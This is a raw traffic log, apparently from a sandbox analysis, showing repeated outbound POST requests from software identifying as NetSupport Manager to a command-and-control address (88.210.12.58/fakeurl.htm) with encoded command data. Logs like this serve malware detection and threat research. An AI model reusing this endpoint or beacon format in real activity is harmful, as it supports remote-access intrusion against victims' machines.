Dec 10, 2024 08:59:13.658073902 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:13.758857012 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:13.859013081 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:13.959028959 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:14.059026957 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:14.160281897 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:14.262058973 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:14.461998940 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:14.968792915 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:15.067454100 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:15.167007923 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:15.268728971 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:15.368026018 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:15.469089985 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:15.569089890 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:15.669758081 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:15.772728920 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:15.870903015 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:15.971019030 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:16.072006941 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:16.173057079 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:16.273070097 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:16.373100042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:16.474026918 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:16.575010061 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:16.676004887 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:16.776011944 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:16.876009941 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:16.980735064 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:17.078012943 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:17.182740927 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:17.279030085 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:17.379991055 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:17.480222940 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:17.580015898 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:17.682744980 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:17.781008005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:17.882740974 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:17.982997894 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:18.084120035 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:18.184130907 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:18.285021067 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:18.386081934 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:18.486048937 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:18.586008072 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:18.687010050 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:18.788005114 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:18.888075113 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:18.990921974 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:19.089015961 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:19.191771030 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:19.290015936 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:19.392729044 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:19.491321087 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:19.595643044 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:19.695045948 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:19.796355963 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:19.897665977 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:19.997049093 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:20.098184109 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:20.199107885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:20.299115896 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:20.400033951 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:20.500049114 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:20.600030899 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:20.701107025 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:20.801012993 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:20.903172970 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:21.002007961 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:21.102811098 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:21.202806950 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:21.303036928 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:21.404026031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:21.506787062 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:21.605256081 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:21.708740950 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:21.808732986 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:21.907011986 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:22.008054018 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:22.108002901 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:22.208062887 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:22.309055090 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:22.410054922 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:22.511002064 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:22.611061096 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:22.712002993 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:22.812006950 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:22.912741899 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:23.014815092 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:23.116745949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:23.213021994 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:23.316740036 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:23.416747093 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
